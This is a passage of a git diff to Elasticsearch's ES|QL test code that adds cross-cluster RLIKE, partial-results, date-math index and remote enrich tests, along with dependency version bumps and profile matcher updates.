REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testNotRLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT RLIKE ".*remote.*" + | STATS c = COUNT(*) BY _index + | SORT 
_index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + private RestClient remoteClusterClient() throws IOException { var clusterHosts = parseClusterHosts(remoteCluster.getHttpAddresses()); return buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[0])); @@ -387,4 +608,28 @@ private static boolean capabilitiesEndpointAvailable() { private static boolean includeCCSMetadata() { return ccsMetadataAvailable() && randomBoolean(); } + + public static class ClusterSettingToggle implements AutoCloseable { + private final RestClient client; + private final String settingKey; + private final Object originalValue; + + public ClusterSettingToggle(RestClient client, String settingKey, Object newValue, Object restoreValue) throws IOException { + this.client = client; + this.settingKey = settingKey; + this.originalValue = restoreValue; + setValue(newValue); + } + + private void setValue(Object value) throws IOException { + Request set = new Request("PUT", "/_cluster/settings"); + set.setJsonEntity("{\"persistent\": {\"" + settingKey + "\": " + value + "}}"); + ESRestTestCase.assertOK(client.performRequest(set)); + } + + @Override + public void close() throws IOException { + setValue(originalValue == null ? "null" : originalValue); + } + } } diff --git a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java index 4b192b6aef948..c3e29602a8b8c 100644 --- a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java +++ b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/RequestIndexFilteringIT.java @@ -38,6 +38,7 @@ import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.instanceOf; +import static org.hamcrest.Matchers.is; @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class RequestIndexFilteringIT extends RequestIndexFilteringTestCase { @@ -91,6 +92,12 @@ protected String from(String... 
indexName) { @Override public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject) throws IOException { + return runEsql(requestObject, true); + } + + @Override + public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject, boolean checkPartialResults) + throws IOException { if (requestObject.allowPartialResults() != null) { assumeTrue( "require allow_partial_results on local cluster", @@ -98,7 +105,7 @@ public Map runEsql(RestEsqlTestCase.RequestObjectBuilder request ); } requestObject.includeCCSMetadata(true); - return super.runEsql(requestObject); + return super.runEsql(requestObject, checkPartialResults); } @After @@ -154,7 +161,30 @@ public void testIndicesDontExistRemote() throws IOException { indexTimestampData(docsTest1, "test1", "2024-11-26", "id1"); Map result = runEsql( - timestampFilter("gte", "2020-01-01").query("FROM *:foo,*:test1 METADATA _index | SORT id1 | KEEP _index, id*") + timestampFilter("gte", "2020-01-01").query("FROM *:foo,*:test1 METADATA _index | SORT id1 | KEEP _index, id*"), + false + ); + + // `foo` index doesn't exist, so the request will currently be successful, but with partial results + var isPartial = result.get("is_partial"); + assertThat(isPartial, is(true)); + assertThat( + result, + matchesMap().entry( + "_clusters", + matchesMap().entry( + "details", + matchesMap().entry( + "remote_cluster", + matchesMap().entry( + "failures", + matchesList().item( + matchesMap().entry("reason", matchesMap().entry("reason", "no such index [foo]").extraOk()).extraOk() + ) + ).extraOk() + ).extraOk() + ).extraOk() + ).extraOk() ); @SuppressWarnings("unchecked") var columns = (List>) result.get("columns"); diff --git a/x-pack/plugin/esql/qa/server/single-node/build.gradle b/x-pack/plugin/esql/qa/server/single-node/build.gradle index 977955ed69e52..ce962ef4c7e74 100644 --- a/x-pack/plugin/esql/qa/server/single-node/build.gradle +++ b/x-pack/plugin/esql/qa/server/single-node/build.gradle @@ -16,9 +16,9 @@ dependencies { javaRestTestImplementation project(xpackModule('esql')) yamlRestTestImplementation project(xpackModule('esql:qa:server')) - javaRestTestImplementation('org.apache.arrow:arrow-vector:16.1.0') - javaRestTestImplementation('org.apache.arrow:arrow-format:16.1.0') - javaRestTestImplementation('org.apache.arrow:arrow-memory-core:16.1.0') + javaRestTestImplementation('org.apache.arrow:arrow-vector:18.3.0') + javaRestTestImplementation('org.apache.arrow:arrow-format:18.3.0') + javaRestTestImplementation('org.apache.arrow:arrow-memory-core:18.3.0') javaRestTestImplementation('org.checkerframework:checker-qual:3.42.0') javaRestTestImplementation('com.google.flatbuffers:flatbuffers-java:23.5.26') javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") @@ -26,7 +26,7 @@ dependencies { javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") javaRestTestImplementation("org.slf4j:slf4j-api:${versions.slf4j}") javaRestTestImplementation("org.slf4j:slf4j-nop:${versions.slf4j}") - javaRestTestImplementation('org.apache.arrow:arrow-memory-unsafe:16.1.0') + javaRestTestImplementation('org.apache.arrow:arrow-memory-unsafe:18.3.0') clusterPlugins project(':plugins:mapper-size') clusterPlugins project(':plugins:mapper-murmur3') diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java 
b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java index 7cc599945e7c0..3484f19afa451 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/EsqlSpecIT.java @@ -9,16 +9,27 @@ import com.carrotsearch.randomizedtesting.annotations.ThreadLeakFilters; +import org.elasticsearch.client.Request; +import org.elasticsearch.common.Strings; import org.elasticsearch.test.TestClustersThreadFilter; import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; import org.elasticsearch.xpack.esql.CsvSpecReader.CsvTestCase; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; +import org.elasticsearch.xpack.esql.plugin.ComputeService; import org.elasticsearch.xpack.esql.qa.rest.EsqlSpecTestCase; +import org.junit.Before; import org.junit.ClassRule; +import java.io.IOException; + @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class EsqlSpecIT extends EsqlSpecTestCase { @ClassRule - public static ElasticsearchCluster cluster = Clusters.testCluster(spec -> spec.plugin("inference-service-test")); + public static ElasticsearchCluster cluster = Clusters.testCluster( + spec -> spec.plugin("inference-service-test").setting("logger." + ComputeService.class.getName(), "DEBUG") // So we log a profile + ); @Override protected String getTestRestCluster() { @@ -47,4 +58,14 @@ protected boolean enableRoundingDoubleValuesOnAsserting() { protected boolean supportsSourceFieldMapping() { return cluster.getNumNodes() == 1; } + + @Before + public void configureChunks() throws IOException { + boolean smallChunks = randomBoolean(); + Request request = new Request("PUT", "/_cluster/settings"); + XContentBuilder builder = JsonXContent.contentBuilder().startObject().startObject("persistent"); + builder.field(PhysicalSettings.VALUES_LOADING_JUMBO_SIZE.getKey(), smallChunks ? 
"1kb" : null); + request.setJsonEntity(Strings.toString(builder.endObject().endObject())); + assertOK(client().performRequest(request)); + } } diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java index 1ef49652c3afc..68c606f2e3fa2 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/RestEsqlIT.java @@ -40,6 +40,9 @@ import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; +import java.time.ZoneOffset; +import java.time.ZonedDateTime; +import java.time.format.DateTimeFormatter; import java.util.ArrayList; import java.util.Arrays; import java.util.Comparator; @@ -786,6 +789,117 @@ && isMillisOrNanos(listOfTypes.get(j))) { } } + public void testDateMathIndexPattern() throws IOException { + ZonedDateTime now = ZonedDateTime.now(ZoneOffset.UTC); + + String[] indices = { + "test-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now), + "test-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(1)), + "test-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(2)) }; + + int idx = 0; + for (String index : indices) { + createIndex(index); + for (int i = 0; i < 10; i++) { + Request request = new Request("POST", "/" + index + "/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"f\":" + idx++ + "}"); + assertOK(client().performRequest(request)); + } + } + + String query = """ + { + "query": "from | sort f asc | limit 1 | keep f" + } + """; + Request request = new Request("POST", "/_query"); + request.setJsonEntity(query); + Response resp = client().performRequest(request); + Map results = entityAsMap(resp); + List values = (List) results.get("values"); + assertThat(values.size(), is(1)); + List row = (List) values.get(0); + assertThat(row.get(0), is(0)); + + query = """ + { + "query": "from | sort f asc | limit 1 | keep f" + } + """; + request = new Request("POST", "/_query"); + request.setJsonEntity(query); + resp = client().performRequest(request); + results = entityAsMap(resp); + values = (List) results.get("values"); + assertThat(values.size(), is(1)); + row = (List) values.get(0); + assertThat(row.get(0), is(10)); + + for (String index : indices) { + assertThat(deleteIndex(index).isAcknowledged(), is(true)); // clean up + } + } + + public void testDateMathInJoin() throws IOException { + ZonedDateTime now = ZonedDateTime.now(ZoneOffset.UTC); + + createIndex("idx", Settings.EMPTY, """ + { + "properties": { + "key": { + "type": "keyword" + } + } + } + """); + + Request request = new Request("POST", "/idx/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"key\":\"foo\"}"); + assertOK(client().performRequest(request)); + + String[] lookupIndices = { + "lookup-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now), + "lookup-index-" + DateTimeFormatter.ofPattern("yyyy", Locale.ROOT).format(now.minusYears(1)) }; + + for (String index : lookupIndices) { + createIndex(index, Settings.builder().put("mode", "lookup").build(), """ + { + "properties": { + "key": { + "type": "keyword" + } + } + } + """); + request = new 
Request("POST", "/" + index + "/_doc/"); + request.addParameter("refresh", "true"); + request.setJsonEntity("{\"key\":\"foo\", \"value\": \"" + index + "\"}"); + assertOK(client().performRequest(request)); + } + + String[] queries = { + "from idx | lookup join <lookup-index-{now/d{yyyy}}> on key | limit 1", + "from idx | lookup join <lookup-index-{now-1y/d{yyyy}}> on key | limit 1" }; + for (int i = 0; i < queries.length; i++) { + String queryPayload = "{\"query\": \"" + queries[i] + "\"}"; + request = new Request("POST", "/_query"); + request.setJsonEntity(queryPayload); + Response resp = client().performRequest(request); + Map results = entityAsMap(resp); + List values = (List) results.get("values"); + assertThat(values.size(), is(1)); + List row = (List) values.get(0); + assertThat(row.get(1), is(lookupIndices[i])); + } + + assertThat(deleteIndex("idx").isAcknowledged(), is(true)); // clean up + for (String index : lookupIndices) { + assertThat(deleteIndex(index).isAcknowledged(), is(true)); // clean up + } + } + static MapMatcher commonProfile() { return matchesMap() // .entry("description", any(String.class)) @@ -829,7 +943,9 @@ private String checkOperatorProfile(Map o) { .entry("process_nanos", greaterThan(0)) .entry("processed_queries", List.of("*:*")) .entry("partitioning_strategies", matchesMap().entry("rest-esql-test:0", "SHARD")); - case "ValuesSourceReaderOperator" -> basicProfile().entry("values_loaded", greaterThanOrEqualTo(0)) + case "ValuesSourceReaderOperator" -> basicProfile().entry("pages_received", greaterThan(0)) + .entry("pages_emitted", greaterThan(0)) + .entry("values_loaded", greaterThanOrEqualTo(0)) .entry("readers_built", matchesMap().extraOk()); case "AggregationOperator" -> matchesMap().entry("pages_processed", greaterThan(0)) .entry("rows_received", greaterThan(0)) @@ -840,7 +956,7 @@ private String checkOperatorProfile(Map o) { case "ExchangeSourceOperator" -> matchesMap().entry("pages_waiting", 0) .entry("pages_emitted", greaterThan(0)) .entry("rows_emitted", greaterThan(0)); - case "ProjectOperator", "EvalOperator" -> basicProfile(); + case "ProjectOperator", "EvalOperator" -> basicProfile().entry("pages_processed", greaterThan(0)); case "LimitOperator" -> matchesMap().entry("pages_processed", greaterThan(0)) .entry("limit", 1000) .entry("limit_remaining", 999) @@ -876,8 +992,7 @@ private String checkOperatorProfile(Map o) { } private MapMatcher basicProfile() { - return matchesMap().entry("pages_processed", greaterThan(0)) - .entry("process_nanos", greaterThan(0)) + return matchesMap().entry("process_nanos", greaterThan(0)) .entry("rows_received", greaterThan(0)) .entry("rows_emitted", greaterThan(0)); } diff --git a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java index df4444f5a1e47..027bf3313e661 100644 --- a/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java +++ b/x-pack/plugin/esql/qa/server/single-node/src/javaRestTest/java/org/elasticsearch/xpack/esql/qa/single_node/StoredFieldsSequentialIT.java @@ -195,6 +195,15 @@ public void buildIndex() throws IOException { bulk.setJsonEntity(b.toString()); Response bulkResponse = client().performRequest(bulk); assertThat(entityToMap(bulkResponse.getEntity(), XContentType.JSON), matchesMap().entry("errors", false).extraOk()); + + // Forcemerge to one segment to
get more consistent results. + Request forcemerge = new Request("POST", "/_forcemerge"); + forcemerge.addParameter("max_num_segments", "1"); + Response forcemergeResponse = client().performRequest(forcemerge); + assertThat( + entityToMap(forcemergeResponse.getEntity(), XContentType.JSON), + matchesMap().entry("_shards", matchesMap().entry("failed", 0).entry("successful", greaterThanOrEqualTo(1)).extraOk()).extraOk() + ); } @Override diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java index 7df7eff0d189b..4285fe112a7c6 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/EsqlSpecTestCase.java @@ -23,6 +23,7 @@ import org.elasticsearch.geometry.utils.WellKnownText; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; +import org.elasticsearch.test.MapMatcher; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.test.rest.TestFeatureService; import org.elasticsearch.xcontent.XContentType; @@ -276,9 +277,7 @@ protected final void doTest(String query) throws Throwable { Map prevTooks = supportsTook() ? tooks() : null; Map answer = runEsql(builder.query(query), testCase.assertWarnings(deduplicateExactWarnings())); - var clusters = answer.get("_clusters"); - var reason = "unexpected partial results" + (clusters != null ? ": _clusters=" + clusters : ""); - assertThat(reason, answer.get("is_partial"), anyOf(nullValue(), is(false))); + assertNotPartial(answer); var expectedColumnsWithValues = loadCsvSpecValues(testCase.expectedResults); @@ -303,6 +302,14 @@ protected final void doTest(String query) throws Throwable { } } + static Map assertNotPartial(Map answer) { + var clusters = answer.get("_clusters"); + var reason = "unexpected partial results" + (clusters != null ? 
": _clusters=" + clusters : ""); + assertThat(reason, answer.get("is_partial"), anyOf(nullValue(), is(false))); + + return answer; + } + private Map tooks() throws IOException { Request request = new Request("GET", "/_xpack/usage"); HttpEntity entity = client().performRequest(request).getEntity(); @@ -431,16 +438,17 @@ public static void assertRequestBreakerEmpty() throws Exception { HttpEntity entity = adminClient().performRequest(new Request("GET", "/_nodes/stats")).getEntity(); Map stats = XContentHelper.convertToMap(XContentType.JSON.xContent(), entity.getContent(), false); Map nodes = (Map) stats.get("nodes"); - for (Object n : nodes.values()) { - Map node = (Map) n; - Map breakers = (Map) node.get("breakers"); - Map request = (Map) breakers.get("request"); - assertMap( - "circuit breakers not reset to 0", - request, - matchesMap().extraOk().entry("estimated_size_in_bytes", 0).entry("estimated_size", "0b") + + MapMatcher breakersEmpty = matchesMap().extraOk().entry("estimated_size_in_bytes", 0).entry("estimated_size", "0b"); + + MapMatcher nodesMatcher = matchesMap(); + for (Object name : nodes.keySet()) { + nodesMatcher = nodesMatcher.entry( + name, + matchesMap().extraOk().entry("breakers", matchesMap().extraOk().entry("request", breakersEmpty)) ); } + assertMap("circuit breakers not reset to 0", stats, matchesMap().extraOk().entry("nodes", nodesMatcher)); }); } diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java index 1cb2a6a526191..1ba4365ea3e92 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RequestIndexFilteringTestCase.java @@ -249,6 +249,11 @@ public Map runEsql(RestEsqlTestCase.RequestObjectBuilder request return RestEsqlTestCase.runEsql(requestObject, new AssertWarnings.NoWarnings(), RestEsqlTestCase.Mode.SYNC); } + public Map runEsql(RestEsqlTestCase.RequestObjectBuilder requestObject, boolean checkPartialResults) + throws IOException { + return RestEsqlTestCase.runEsql(requestObject, new AssertWarnings.NoWarnings(), RestEsqlTestCase.Mode.SYNC, checkPartialResults); + } + protected void indexTimestampData(int docs, String indexName, String date, String differentiatorFieldName) throws IOException { indexTimestampDataForClient(client(), docs, indexName, date, differentiatorFieldName); } diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java index 0c29d7a711257..5e85c20b026ab 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/RestEsqlTestCase.java @@ -60,6 +60,7 @@ import static org.elasticsearch.test.MapMatcher.assertMap; import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.elasticsearch.xpack.esql.EsqlTestUtils.as; +import static org.elasticsearch.xpack.esql.qa.rest.EsqlSpecTestCase.assertNotPartial; import static org.elasticsearch.xpack.esql.qa.rest.RestEsqlTestCase.Mode.ASYNC; import static org.elasticsearch.xpack.esql.qa.rest.RestEsqlTestCase.Mode.SYNC; import static 
org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter.dateTimeToString; @@ -1248,13 +1249,21 @@ public static Map runEsqlAsync(RequestObjectBuilder requestObjec return runEsqlAsync(requestObject, randomBoolean(), new AssertWarnings.NoWarnings()); } + public static Map runEsql( + RequestObjectBuilder requestObject, + AssertWarnings assertWarnings, + Mode mode, + boolean checkPartialResults + ) throws IOException { + var results = mode == ASYNC + ? runEsqlAsync(requestObject, randomBoolean(), assertWarnings) + : runEsqlSync(requestObject, assertWarnings); + return checkPartialResults ? assertNotPartial(results) : results; + } + public static Map runEsql(RequestObjectBuilder requestObject, AssertWarnings assertWarnings, Mode mode) throws IOException { - if (mode == ASYNC) { - return runEsqlAsync(requestObject, randomBoolean(), assertWarnings); - } else { - return runEsqlSync(requestObject, assertWarnings); - } + return runEsql(requestObject, assertWarnings, mode, true); } public static Map runEsqlSync(RequestObjectBuilder requestObject, AssertWarnings assertWarnings) throws IOException { diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java index 129676183a853..a8d4b9ca677fc 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/EsqlQueryGenerator.java @@ -38,7 +38,11 @@ public class EsqlQueryGenerator { - public record Column(String name, String type) {} + public static final String COLUMN_NAME = "name"; + public static final String COLUMN_TYPE = "type"; + public static final String COLUMN_ORIGINAL_TYPES = "original_types"; + + public record Column(String name, String type, List originalTypes) {} public record QueryExecuted(String query, int depth, List outputSchema, List> result, Exception exception) {} @@ -288,7 +292,10 @@ public static boolean fieldCanBeUsed(Column field) { // https://github.com/elastic/elasticsearch/issues/121741 field.name().equals("") // this is a known pathological case, no need to test it for now - || field.name().equals("")) == false; + || field.name().equals("") + // no dense vectors for now, they are not supported in most commands + || field.type().contains("vector") + || field.originalTypes.stream().anyMatch(x -> x.contains("vector"))) == false; } public static String unquote(String colName) { diff --git a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java index 56fc925ed8421..f9d0b20a1e742 100644 --- a/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java +++ b/x-pack/plugin/esql/qa/server/src/main/java/org/elasticsearch/xpack/esql/qa/rest/generative/GenerativeRestTest.java @@ -29,6 +29,9 @@ import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.ENRICH_POLICIES; import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.availableDatasetsForEs; import static org.elasticsearch.xpack.esql.CsvTestsDataLoader.loadDataSetIntoEs; +import static org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_NAME; +import static 
org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_ORIGINAL_TYPES; +import static org.elasticsearch.xpack.esql.qa.rest.generative.EsqlQueryGenerator.COLUMN_TYPE; public abstract class GenerativeRestTest extends ESRestTestCase { @@ -53,7 +56,6 @@ public abstract class GenerativeRestTest extends ESRestTestCase { "Data too large", // Circuit breaker exceptions eg. https://github.com/elastic/elasticsearch/issues/130072 // Awaiting fixes for correctness - "Expecting the following columns \\[.*\\], got", // https://github.com/elastic/elasticsearch/issues/129000 "Expecting at most \\[.*\\] columns, got \\[.*\\]" // https://github.com/elastic/elasticsearch/issues/129561 ); @@ -145,7 +147,7 @@ private static CommandGenerator.ValidationResult checkResults( ); if (outputValidation.success() == false) { for (Pattern allowedError : ALLOWED_ERROR_PATTERNS) { - if (allowedError.matcher(outputValidation.errorMessage()).matches()) { + if (isAllowedError(outputValidation.errorMessage(), allowedError)) { return outputValidation; } } @@ -156,13 +158,24 @@ private static CommandGenerator.ValidationResult checkResults( private void checkException(EsqlQueryGenerator.QueryExecuted query) { for (Pattern allowedError : ALLOWED_ERROR_PATTERNS) { - if (allowedError.matcher(query.exception().getMessage()).matches()) { + if (isAllowedError(query.exception().getMessage(), allowedError)) { return; } } fail("query: " + query.query() + "\nexception: " + query.exception().getMessage()); } + /** + * Long lines in exceptions can be split across several lines. When a newline is inserted, the end of the current line and the beginning + * of the new line are marked with a backslash {@code \}; the new line will also have whitespace before the backslash for aligning. 
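+     * For example (illustrative): a wrapped message consisting of {@code "Data too la\"} followed on the next line by {@code "    \rge"} is normalized back to {@code "Data too large"} before it is matched against ALLOWED_ERROR_PATTERNS.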
+ */ + private static final Pattern ERROR_MESSAGE_LINE_BREAK = Pattern.compile("\\\\\n\\s*\\\\"); + + private static boolean isAllowedError(String errorMessage, Pattern allowedPattern) { + String errorWithoutLineBreaks = ERROR_MESSAGE_LINE_BREAK.matcher(errorMessage).replaceAll(""); + return allowedPattern.matcher(errorWithoutLineBreaks).matches(); + } + @SuppressWarnings("unchecked") private EsqlQueryGenerator.QueryExecuted execute(String command, int depth) { try { @@ -184,12 +197,23 @@ private EsqlQueryGenerator.QueryExecuted execute(String command, int depth) { } @SuppressWarnings("unchecked") - private List outputSchema(Map a) { - List> cols = (List>) a.get("columns"); + private static List outputSchema(Map a) { + List> cols = (List>) a.get("columns"); if (cols == null) { return null; } - return cols.stream().map(x -> new EsqlQueryGenerator.Column(x.get("name"), x.get("type"))).collect(Collectors.toList()); + return cols.stream() + .map(x -> new EsqlQueryGenerator.Column((String) x.get(COLUMN_NAME), (String) x.get(COLUMN_TYPE), originalTypes(x))) + .collect(Collectors.toList()); + } + + @SuppressWarnings("unchecked") + private static List originalTypes(Map x) { + List originalTypes = (List) x.get(COLUMN_ORIGINAL_TYPES); + if (originalTypes == null) { + return List.of(); + } + return originalTypes; } private List availableIndices() throws IOException { diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java b/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java index 7ec9ee6344551..210a4be28f840 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/java/org/elasticsearch/xpack/esql/EsqlTestUtils.java @@ -863,7 +863,7 @@ static Version randomVersion() { } public static WildcardLike wildcardLike(Expression left, String exp) { - return new WildcardLike(EMPTY, left, new WildcardPattern(exp)); + return new WildcardLike(EMPTY, left, new WildcardPattern(exp), false); } public static RLike rlike(Expression left, String exp) { diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec index 9bfb08eb82b45..2aa6189a957ec 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/enrich.csv-spec @@ -661,3 +661,104 @@ from * author.keyword:keyword|book_no:keyword|scalerank:integer|street:keyword|bytes_in:ul|@timestamp:unsupported|abbrev:keyword|city_location:geo_point|distance:double|description:unsupported|birth_date:date|language_code:integer|intersects:boolean|client_ip:unsupported|event_duration:long|version:version|language_name:keyword Fyodor Dostoevsky |1211 |null |null |null |null |null |null |null |null |null |null |null |null |null |null |null ; + + +statsAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1", "Connected to 10.1.0.2") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| STATS messages = count_distinct(message) BY language_name +; + +messages:long | language_name:keyword +2 | English +; + + +enrichAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy 
ON language_code +| RENAME language_name AS first_language_name +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +coordinatorEnrichAfterRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _coordinator:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +doubleRemoteEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _remote:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +enrichAfterCoordinatorEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _coordinator:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; + + +doubleCoordinatorEnrich +required_capability: enrich_load + +FROM sample_data +| KEEP message +| WHERE message IN ("Connected to 10.1.0.1") +| EVAL language_code = "1" +| ENRICH _coordinator:languages_policy ON language_code +| RENAME language_name AS first_language_name +| ENRICH _coordinator:languages_policy ON language_code +; + +message:keyword | language_code:keyword | first_language_name:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | English | English +; diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec index 1cd9f60d01581..2c5b8a650a64a 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec +++ 